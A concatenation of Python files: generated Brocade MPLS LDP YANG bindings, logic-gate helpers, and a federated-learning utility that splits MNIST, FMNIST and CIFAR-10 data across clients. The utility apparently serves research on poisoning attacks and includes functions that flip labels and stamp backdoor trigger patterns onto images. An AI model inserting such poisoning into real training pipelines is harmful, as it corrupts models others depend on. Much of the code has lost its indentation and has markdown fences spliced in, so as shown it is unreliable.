      t = YANGDynClass(v,base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ldp_fec_prefix_longer must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
        })

    self.__ldp_fec_prefix_longer = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ldp_fec_prefix_longer(self):
    self.__ldp_fec_prefix_longer = YANGDynClass(base=YANGListType("prefix",ldp_fec_prefix_longer.ldp_fec_prefix_longer, yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='prefix', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-prefix-longer", rest_name="ldp-fec-prefix-longer", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-longer', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
  def _get_ldp_fec_vcid(self):
    """
    Getter method for ldp_fec_vcid, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcid (list)
    """
    return self.__ldp_fec_vcid

  def _set_ldp_fec_vcid(self, v, load=False):
    """
    Setter method for ldp_fec_vcid, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_vcid (list)
    If this variable is read-only (config: false) in the
    source YANG file, then _set_ldp_fec_vcid is considered as a private
    method. Backends looking to populate this variable should
    do so via calling thisObj._set_ldp_fec_vcid() directly.
    """
    if hasattr(v, "_utype"):
      v = v._utype(v)
    try:
      t = YANGDynClass(v,base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
    except (TypeError, ValueError):
      raise ValueError({
          'error-string': """ldp_fec_vcid must be of a type compatible with list""",
          'defined-type': "list",
          'generated-type': """YANGDynClass(base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)""",
        })

    self.__ldp_fec_vcid = t
    if hasattr(self, '_set'):
      self._set()

  def _unset_ldp_fec_vcid(self):
    self.__ldp_fec_vcid = YANGDynClass(base=YANGListType("vc_id",ldp_fec_vcid.ldp_fec_vcid, yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, is_container='list', user_ordered=False, path_helper=self._path_helper, yang_keys='vc-id', extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}), is_container='list', yang_name="ldp-fec-vcid", rest_name="ldp-fec-vcid", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-vcid', u'cli-suppress-show-path': None}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='list', is_config=False)
def _get_ldp_fec_prefix_prefix(self):
"""
Getter method for ldp_fec_prefix_prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_prefix (container)
"""
return self.__ldp_fec_prefix_prefix
def _set_ldp_fec_prefix_prefix(self, v, load=False):
"""
Setter method for ldp_fec_prefix_prefix, mapped from YANG variable /mpls_state/ldp/fec/ldp_fec_prefix_prefix (container)
If this variable is read-only (config: false) in the
source YANG file, then _set_ldp_fec_prefix_prefix is considered as a private
method. Backends looking to populate this variable should
do so via calling thisObj._set_ldp_fec_prefix_prefix() directly.
"""
if hasattr(v, "_utype"):
v = v._utype(v)
try:
t = YANGDynClass(v,base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
except (TypeError, ValueError):
raise ValueError({
'error-string': """ldp_fec_prefix_prefix must be of a type compatible with container""",
'defined-type': "container",
'generated-type': """YANGDynClass(base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)""",
})
self.__ldp_fec_prefix_prefix = t
if hasattr(self, '_set'):
self._set()
def _unset_ldp_fec_prefix_prefix(self):
self.__ldp_fec_prefix_prefix = YANGDynClass(base=ldp_fec_prefix_prefix.ldp_fec_prefix_prefix, is_container='container', presence=False, yang_name="ldp-fec-prefix-prefix", rest_name="ldp-fec-prefix-prefix", parent=self, path_helper=self._path_helper, extmethods=self._extmethods, register_paths=True, extensions={u'tailf-common': {u'callpoint': u'mpls-ldp-fec-prefix-prefix-ldp-fec-prefix-prefix-1'}}, namespace='urn:brocade.com:mgmt:brocade-mpls-operational', defining_module='brocade-mpls-operational', yang_type='container', is_config=False)
ldp_fec_summary = __builtin__.property(_get_ldp_fec_summary)
ldp_fec_prefixes = __builtin__.property(_get_ldp_fec_prefixes)
ldp_fec_vcs = __builtin__.property(_get_ldp_fec_vcs)
ldp_fec_prefix_longer = __builtin__.property(_get_ldp_fec_prefix_longer)
ldp_fec_vcid = __builtin__.property(_get_ldp_fec_vcid)
ldp_fec_prefix_prefix = __builtin__.property(_get_ldp_fec_prefix_prefix)
_pyangbind_elements = {'ldp_fec_summary': ldp_fec_summary, 'ldp_fec_prefixes': ldp_fec_prefixes, 'ldp_fec_vcs': ldp_fec_vcs, 'ldp_fec_prefix_longer': ldp_fec_prefix_longer, 'ldp_fec_vcid': ldp_fec_vcid, 'ldp_fec_prefix_prefix': ldp_fec_prefix_prefix, }
# --- File: torch_aesthetics/__init__.py (repo: IsaacCorley/deep-aesthetics-pytorch, MIT) ---
from . import aadb
from . import metrics
from . import losses
from . import models
# --- File: src/osim/env/__init__.py (repo: hashhar/major-project, MIT) ---
from __future__ import absolute_import
from .arm import *
from .human import *
from .osim import *
# --- File: logiccircuit/logic.py (repo: TINYT1ME/LogicCircuit, MIT) ---

# Logic for all gates
def not_gate_logic(inp):
return not inp[0].value
def and_gate_logic(inp):
return inp[0].value and inp[1].value
def nand_gate_logic(inp):
return not (inp[0].value and inp[1].value)
def or_gate_logic(inp):
return inp[0].value or inp[1].value
def nor_gate_logic(inp):
return not (inp[0].value or inp[1].value)
def xnor_gate_logic(inp):
return inp[0].value is inp[1].value
def xor_gate_logic(inp):
return inp[0].value is not inp[1].value
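# A minimal, self-contained check of the gate logic above. `Pin` is a
# hypothetical stand-in for the wire/pin objects the rest of the package
# supplies; the gate functions only ever read a `.value` attribute.

```python
# `Pin` is a hypothetical stub; the gates only need `.value`.
class Pin:
    def __init__(self, value):
        self.value = value


def not_gate_logic(inp):
    return not inp[0].value


def and_gate_logic(inp):
    return inp[0].value and inp[1].value


def xor_gate_logic(inp):
    return inp[0].value is not inp[1].value


hi, lo = Pin(True), Pin(False)
print(not_gate_logic([lo]))      # True
print(and_gate_logic([hi, lo]))  # False
print(xor_gate_logic([hi, lo]))  # True
```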
# --- File: src/util.py (repo: kppw99/UG_FedAVG, MIT) ---
import gzip
import random
import pickle
import argparse
import numpy as np
import pandas as pd
from pathlib import Path
from matplotlib import pyplot
from scipy.stats import entropy
import matplotlib.pyplot as plt
import torch
from torch.utils.data import TensorDataset
from torch.utils.data import DataLoader
from torch.utils.data import Dataset
import torchvision.transforms as transforms
import torchvision.datasets as datasets
use_cuda = torch.cuda.is_available()
class CustomTensorDataset(Dataset):
"""TensorDataset with support of transforms.
"""
def __init__(self, tensors, transform=None):
assert all(tensors[0].size(0) == tensor.size(0) for tensor in tensors)
self.tensors = tensors
self.transform = transform
def __getitem__(self, index):
x = self.tensors[0][index]
if self.transform:
x = self.transform(x)
y = self.tensors[1][index]
return x, y
def __len__(self):
return self.tensors[0].size(0)
def _split_and_shuffle_labels(y_data, seed):
num_of_class = len(set(y_data.tolist()))
y_data=pd.DataFrame(y_data, columns=['label'])
y_data['index'] = np.arange(len(y_data))
label_dict = dict()
cur_idx = list()
for i in range(num_of_class):
var_name = 'label' + str(i)
label_info = y_data[y_data['label'] == i]
np.random.seed(seed)
label_info = np.random.permutation(label_info)
label_info = pd.DataFrame(label_info, columns=['label', 'index'])
label_dict.update({var_name: label_info })
cur_idx.append(0)
return label_dict, cur_idx
def _get_iid_subsamples_indices(y_data, number_of_samples, seed):
num_of_class = len(set(y_data.tolist()))
label_dict, cur_idx = _split_and_shuffle_labels(y_data, seed)
sample_dict = dict()
dist = 1.0 / num_of_class
for i in range(number_of_samples):
sample_name = 'sample' + str(i)
dumb = pd.DataFrame()
for j in range(num_of_class):
label_name = str('label') + str(j)
if i == (number_of_samples - 1):
next_idx = len(label_dict[label_name])
else:
next_idx = int(len(label_dict[label_name]) * dist)
next_idx += cur_idx[j]
temp = label_dict[label_name][cur_idx[j]:next_idx]
dumb=pd.concat([dumb, temp], axis=0)
cur_idx[j] = next_idx
dumb.reset_index(drop=True, inplace=True)
sample_dict.update({sample_name: dumb})
return sample_dict
def _get_non_iid_subsamples_indices(y_data, number_of_samples, pdist, seed):
num_of_class = len(set(y_data.tolist()))
label_dict, cur_idx = _split_and_shuffle_labels(y_data, seed)
sample_dict = dict()
for i in range(number_of_samples):
sample_name = 'sample' + str(i)
dumb = pd.DataFrame()
dist1 = pdist * (2 / 3)
dist2 = pdist - dist1
dist3 = (1.0 - pdist) / (num_of_class - 2)
for j in range(num_of_class):
label_name = str('label') + str(j)
dist = dist1 if j == i else dist2 if (j % 5) == (i % 5) else dist3
if i == (number_of_samples - 1):
next_idx = len(label_dict[label_name])
else:
next_idx = int(len(label_dict[label_name]) * dist)
next_idx += cur_idx[j]
temp = label_dict[label_name][cur_idx[j]:next_idx]
dumb = pd.concat([dumb, temp], axis=0)
cur_idx[j] = next_idx
dumb.reset_index(drop=True, inplace=True)
sample_dict.update({sample_name: dumb})
return sample_dict
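# Stdlib sketch of the per-label fractions the non-IID split above assigns to
# client i: dist1 of its own label, dist2 of the label with the same index
# mod 5, dist3 of every other label. The helper name `label_fractions` is
# ours, for illustration only; it assumes 10 classes as in MNIST/CIFAR-10.

```python
# Hypothetical helper illustrating the non-IID fraction scheme above.
def label_fractions(i, pdist=0.6, num_of_class=10):
    dist1 = pdist * (2 / 3)                     # client i's own label
    dist2 = pdist - dist1                       # the label with index i +/- 5
    dist3 = (1.0 - pdist) / (num_of_class - 2)  # each remaining label
    return [dist1 if j == i else dist2 if (j % 5) == (i % 5) else dist3
            for j in range(num_of_class)]


fr = label_fractions(i=3)
print(round(sum(fr), 9))  # 1.0; the fractions cover each label pool exactly once
```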
def _create_subsamples(sample_dict, x_data, y_data, x_name, y_name):
x_data_dict = dict()
y_data_dict = dict()
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
if torch.cuda.is_available():
x_info = x_info.cuda()
x_data_dict.update({xname: x_info})
y_info = y_data[indices]
if torch.cuda.is_available():
y_info = y_info.cuda()
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _add_bd_pattern(x, start_idx=1, size=5, show=False):
temp_x = x.reshape(28, 28)
# trigger pattern (plus)
for i in range(start_idx, start_idx + size):
temp_x[i][(start_idx + size) // 2] = 1.0 # vertical line
temp_x[(start_idx + size) // 2][i] = 1.0 # horizontal line
if show is True:
plt.imshow(temp_x)
plt.show()
return temp_x.reshape(1, 28, 28)
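# Plain-list sketch of the "plus" trigger _add_bd_pattern draws: with
# start_idx=1 and size=5 the centre row/column is (1 + 5) // 2 == 3, so a
# 5-pixel vertical bar and a 5-pixel horizontal bar cross at (3, 3). The
# nested-list image stands in for the real 1x28x28 tensor.

```python
# Illustration only: nested lists stand in for the 28x28 image tensor.
def add_plus_trigger(img, start_idx=1, size=5):
    mid = (start_idx + size) // 2
    for i in range(start_idx, start_idx + size):
        img[i][mid] = 1.0  # vertical bar
        img[mid][i] = 1.0  # horizontal bar
    return img


img = add_plus_trigger([[0.0] * 28 for _ in range(28)])
print(img[3][1:6])  # [1.0, 1.0, 1.0, 1.0, 1.0]
print(sum(v for row in img for v in row))  # 9.0 (5 + 5 pixels minus the shared centre)
```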
def _add_bd_pattern_cifar10(x, start_idx=1, size=5, show=False):
temp_x = np.transpose(x, (1, 2, 0))
for i in range(2):
for j in range(start_idx, start_idx + size):
temp_x[j][(start_idx + size) // 2][i] = 1.0
temp_x[(start_idx + size) // 2][j][i] = 1.0
if show is True:
plt.imshow(temp_x)
plt.show()
return np.transpose(temp_x, (2, 0, 1))
def _add_bd_pattern_fmnist(x, start_idx=1, size=5, show=False):
    # trigger pattern: two vertical and two horizontal lines, offset one pixel from the centre
for i in range(start_idx, start_idx + size):
x[i][((start_idx + size) // 2) - 1] = 255.0 # vertical line
x[i][((start_idx + size) // 2) + 1] = 255.0 # vertical line
x[((start_idx + size) // 2) - 1][i] = 255.0 # horizontal line
x[((start_idx + size) // 2) + 1][i] = 255.0 # horizontal line
if show is True:
plt.imshow(x)
plt.show()
return x
def _create_corrupted_subsamples(sample_dict, x_data, y_data, x_name, y_name,
cor_local_ratio=1.0, cor_label_ratio=0.2, cor_data_ratio=0.5, mode=1):
x_data_dict = dict()
y_data_dict = dict()
# make corrupted info
num_of_local = len(sample_dict)
num_of_label = len(set(y_data.tolist()))
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
cor_label_idx = random.sample(range(0, num_of_label), int(num_of_label * cor_label_ratio))
temp = set(y_data.tolist())
temp.difference_update(cor_label_idx)
print('[*] Corrupted Label')
if mode == 1:
temp = list(temp)
cor_vals = random.sample(temp, int(num_of_label * cor_label_ratio))
print(cor_label_idx, '->', cor_vals)
else:
print(cor_label_idx, '-> random value')
print('')
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
if torch.cuda.is_available():
x_info = x_info.cuda()
x_data_dict.update({xname: x_info})
y_info = y_data[indices]
if i in cor_local_idx:
val_cnt = 0
for j in cor_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
if mode == 1:
y_info[corrupted_idx] = cor_vals[val_cnt]
val_cnt = val_cnt + 1
                else:
                    # Copy the candidate-label set so difference_update does not
                    # permanently shrink it across iterations, and avoid reusing
                    # `i`, which shadows the outer sample index.
                    for k in corrupted_idx:
                        cand = set(temp)
                        cand.difference_update([y_info[k].item()])
                        y_info[k] = random.sample(sorted(cand), 1)[0]
if torch.cuda.is_available():
y_info = y_info.cuda()
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _create_backdoor_subsamples(sample_dict, x_data, y_data, x_name, y_name,
cor_label_idx, target_label, cor_local_ratio=1.0, cor_data_ratio=0.5, dataset='mnist'):
x_data_dict = dict()
y_data_dict = dict()
# make corrupted info
num_of_local = len(sample_dict)
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
# len(sample_dict) is a number of client
for i in range(len(sample_dict)):
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
y_info = y_data[indices]
if i in cor_local_idx:
for j in cor_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
y_info[corrupted_idx] = target_label
for idx in corrupted_idx:
if dataset=='mnist':
x_info[idx] = _add_bd_pattern(x_info[idx])
elif dataset=='fmnist':
x_info[idx] = _add_bd_pattern_fmnist(x_info[idx])
elif dataset=='cifar10':
x_info[idx] = _add_bd_pattern_cifar10(x_info[idx])
if torch.cuda.is_available():
x_info = x_info.cuda()
y_info = y_info.cuda()
x_data_dict.update({xname: x_info})
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _create_backdoor_subsamples2(sample_dict, x_data, y_data, x_name, y_name,
cor_local_idx, cor_label_idx, target_label,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5, dataset='mnist'):
x_data_dict = dict()
y_data_dict = dict()
num_of_label = len(set(y_data.tolist()))
major_cnt = 0
minor_cnt = 0
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
y_info = y_data[indices]
temp_label_idx = cor_label_idx.copy()
if i in cor_local_idx:
cor_major_label_idx = list()
cor_major_label_idx.append(i)
cor_major_label_idx.append((i + 5) % num_of_label)
for j in cor_major_label_idx:
if j in temp_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_major_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
y_info[corrupted_idx] = target_label
for idx in corrupted_idx:
if dataset == 'mnist':
x_info[idx] = _add_bd_pattern(x_info[idx])
elif dataset == 'fmnist':
x_info[idx] = _add_bd_pattern_fmnist(x_info[idx])
elif dataset == 'cifar10':
x_info[idx] = _add_bd_pattern_cifar10(x_info[idx])
major_cnt += 1
temp_label_idx.remove(j)
for j in temp_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_minor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
y_info[corrupted_idx] = target_label
for idx in corrupted_idx:
if dataset == 'mnist':
x_info[idx] = _add_bd_pattern(x_info[idx])
elif dataset=='fmnist':
x_info[idx] = _add_bd_pattern_fmnist(x_info[idx])
elif dataset == 'cifar10':
x_info[idx] = _add_bd_pattern_cifar10(x_info[idx])
minor_cnt += 1
if torch.cuda.is_available():
x_info = x_info.cuda()
y_info = y_info.cuda()
x_data_dict.update({xname: x_info})
y_data_dict.update({yname: y_info})
print('backdoor cnt:', major_cnt, minor_cnt)
print('cor_label_idx:', cor_label_idx)
print('')
return x_data_dict, y_data_dict
def _create_corrupted_subsamples2(sample_dict, x_data, y_data, x_name, y_name,
cor_local_ratio=1.0, cor_minor_label_cnt=4,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5,
mode=1):
x_data_dict = dict()
y_data_dict = dict()
# make corrupted info
num_of_local = len(sample_dict)
num_of_label = len(set(y_data.tolist()))
cor_local_idx = random.sample(range(0, num_of_local), int(num_of_local * cor_local_ratio))
for i in range(len(sample_dict)): ### len(sample_dict)= number of samples
xname = x_name + str(i)
yname = y_name + str(i)
sample_name = "sample" + str(i)
indices = np.sort(np.array(sample_dict[sample_name]['index']))
x_info = x_data[indices, :]
if torch.cuda.is_available():
x_info = x_info.cuda()
x_data_dict.update({xname: x_info})
y_info = y_data[indices]
if i in cor_local_idx:
cor_major_label_idx = list()
cor_major_label_idx.append(i)
cor_major_label_idx.append((i + 5) % num_of_label)
for j in cor_major_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_major_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
ori_val = y_info[corrupted_idx][0]
y_info[corrupted_idx] = (ori_val + 5) % num_of_label
temp = set(y_data.tolist())
temp.difference_update(cor_major_label_idx)
cor_minor_label_idx = random.sample(temp, cor_minor_label_cnt)
temp.difference_update(cor_minor_label_idx)
cor_minor_vals = random.sample(temp, cor_minor_label_cnt)
print(cor_major_label_idx, '|', cor_minor_label_idx, '->', cor_minor_vals)
val_cnt = 0
for j in cor_minor_label_idx:
temp_dices = np.where(y_info == j)[0]
cor_data_len = int(len(temp_dices) * cor_minor_data_ratio)
corrupted_idx = random.sample(list(temp_dices), cor_data_len)
if mode == 1:
y_info[corrupted_idx] = cor_minor_vals[val_cnt]
val_cnt = val_cnt + 1
                else:
                    # Copy the candidate-label set so difference_update does not
                    # permanently shrink it across iterations, and avoid reusing
                    # `i`, which shadows the outer sample index.
                    for k in corrupted_idx:
                        cand = set(temp)
                        cand.difference_update([y_info[k].item()])
                        y_info[k] = random.sample(sorted(cand), 1)[0]
if torch.cuda.is_available():
y_info = y_info.cuda()
y_data_dict.update({yname: y_info})
return x_data_dict, y_data_dict
def _print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict, x_val_dict=None, y_val_dict=None):
    total = 0  # renamed from `sum` to avoid shadowing the built-in
    print('[*] Train Dataset (x, y)')
    for idx, (x_key, y_key) in enumerate(zip(x_train_dict, y_train_dict)):
        total += len(x_train_dict[x_key])
        print('- sample{}: {}, {}'.format(idx, len(x_train_dict[x_key]), len(y_train_dict[y_key])))
        print(': ', end='')
        for i in range(10):  # per-class counts (assumes 10 classes)
            print(y_train_dict[y_key].tolist().count(i), end=' ')
        print('')
    print('# total:', total, end='\n\n')
    total = 0
    print('[*] Test Dataset (x, y)')
    for idx, (x_key, y_key) in enumerate(zip(x_test_dict, y_test_dict)):
        total += len(x_test_dict[x_key])
        print('- sample{}: {}, {}'.format(idx, len(x_test_dict[x_key]), len(y_test_dict[y_key])))
        print(': ', end='')
        for i in range(10):
            print(y_test_dict[y_key].tolist().count(i), end=' ')
        print('')
    print('# total:', total, end='\n\n')
    if x_val_dict is not None:
        total = 0
        print('[*] Valid Dataset (x, y)')
        for idx, (x_key, y_key) in enumerate(zip(x_val_dict, y_val_dict)):
            total += len(x_val_dict[x_key])
            print('- sample{}: {}, {}'.format(idx, len(x_val_dict[x_key]), len(y_val_dict[y_key])))
            print(': ', end='')
            for i in range(10):
                print(y_val_dict[y_key].tolist().count(i), end=' ')
            print('')
        print('# total:', total, end='\n\n')
def _load_data(path='../data/mnist.pkl.gz', seed=1, torch_tensor=True, pre_train=False):
data_path = Path(path)
with gzip.open(data_path, "rb") as f:
((x_train, y_train), (x_test, y_test)) = pickle.load(f)
if pre_train:
pre_rate = 0.05
train_size = len(x_train)
pre_data_size = int(train_size * pre_rate)
np.random.seed(seed)
shuffled_indices = np.random.permutation(train_size)
pre_indices = shuffled_indices[:pre_data_size]
tr_indices = shuffled_indices[pre_data_size:]
x_pre_train = x_train[pre_indices]
y_pre_train = y_train[pre_indices]
x_train = x_train[tr_indices]
y_train = y_train[tr_indices]
if torch_tensor:
x_train, y_train, x_test, y_test, x_pre_train, y_pre_train =\
map(torch.tensor, (x_train, y_train, x_test, y_test, x_pre_train, y_pre_train))
return x_train, y_train, x_test, y_test, x_pre_train, y_pre_train
else:
if torch_tensor:
x_train, y_train, x_test, y_test = map(torch.tensor, (x_train, y_train, x_test, y_test))
return x_train, y_train, x_test, y_test, None, None
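# Stdlib sketch of the pre-training split _load_data performs when
# pre_train=True: shuffle the training indices with a fixed seed, hand the
# first 5% to the pre-training pool and keep the rest for federated training.
# `split_pretrain` is our illustrative name, and random.shuffle stands in for
# np.random.permutation.

```python
import random


def split_pretrain(train_size, pre_rate=0.05, seed=1):
    # Shuffle deterministically, then cut off the first pre_rate fraction.
    indices = list(range(train_size))
    random.Random(seed).shuffle(indices)
    pre_data_size = int(train_size * pre_rate)
    return indices[:pre_data_size], indices[pre_data_size:]


pre_idx, tr_idx = split_pretrain(1000)
print(len(pre_idx), len(tr_idx))  # 50 950
```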
def load_data(data='mnist', seed=1, torch_tensor=True, pre_train=False):
if data=='mnist' or data=='fmnist':
path='../data/' + data + '.pkl.gz'
tr_X, tr_y, te_X, te_y, pre_X, pre_y = _load_data(path, seed, torch_tensor, pre_train)
if pre_train:
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape, pre_X.shape, pre_y.shape)
else:
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape)
return tr_X, tr_y, te_X, te_y, pre_X, pre_y
elif data=='cifar10':
path = '../data/cifar10.pkl.gz'
tr_X, tr_y, te_X, te_y, pre_X, pre_y = _load_data(path, seed, torch_tensor, pre_train)
tr_X = np.transpose(tr_X, (0, 3, 1, 2))
te_X = np.transpose(te_X, (0, 3, 1, 2))
tr_y = torch.tensor(tr_y.detach().clone().reshape(-1), dtype=torch.int64)
te_y = torch.tensor(te_y.detach().clone().reshape(-1), dtype=torch.int64)
if pre_train:
            pre_X = np.transpose(pre_X, (0, 3, 1, 2))
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape, pre_X.shape, pre_y.shape)
else:
print(tr_X.shape, tr_y.shape, te_X.shape, te_y.shape)
return tr_X, tr_y, te_X, te_y, pre_X, pre_y
else:
print('Please check the data name!:', data)
return None, None, None, None, None, None
def create_non_iid_samples(x_train, y_train, x_test, y_test,
num_of_sample=10, pdist=0.6, seed=1, verbose=True):
sample_dict_train = _get_non_iid_subsamples_indices(y_train, num_of_sample, pdist, seed)
x_train_dict, y_train_dict = _create_subsamples(sample_dict_train, x_train, y_train,
'x_train', 'y_train')
sample_dict_test = _get_non_iid_subsamples_indices(y_test, num_of_sample, pdist, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test,
'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_corrupted_non_iid_samples(x_train, y_train, x_test, y_test,
cor_local_ratio=1.0,
cor_minor_label_cnt=4,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5, mode=1,
num_of_sample=10, pdist=0.6, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_non_iid_subsamples_indices(y_train, num_of_sample, pdist, seed)
x_train_dict, y_train_dict = _create_corrupted_subsamples2(sample_dict_train, x_train, y_train,
'x_train', 'y_train',
cor_local_ratio, cor_minor_label_cnt,
cor_major_data_ratio,
cor_minor_data_ratio, mode)
sample_dict_test = _get_non_iid_subsamples_indices(y_test, num_of_sample, pdist, seed)
x_test_dict, y_test_dict = _create_subsamples(sample_dict_test, x_test, y_test, 'x_test', 'y_test')
if verbose:
_print_dict(x_train_dict, y_train_dict, x_test_dict, y_test_dict)
return x_train_dict, y_train_dict, x_test_dict, y_test_dict
def create_backdoor_non_iid_samples(x_train, y_train, x_test, y_test, target_label,
cor_local_ratio=1.0,
cor_minor_label_cnt=4,
cor_major_data_ratio=0.2,
cor_minor_data_ratio=0.5,
num_of_sample=10, pdist=0.6, seed=1, verbose=True, dataset='mnist'):
sample_dict_train = _get_non_iid_subsamples_indices(y_train, num_of_sample, pdist, seed)
num_of_local = len(sample_dict_train)
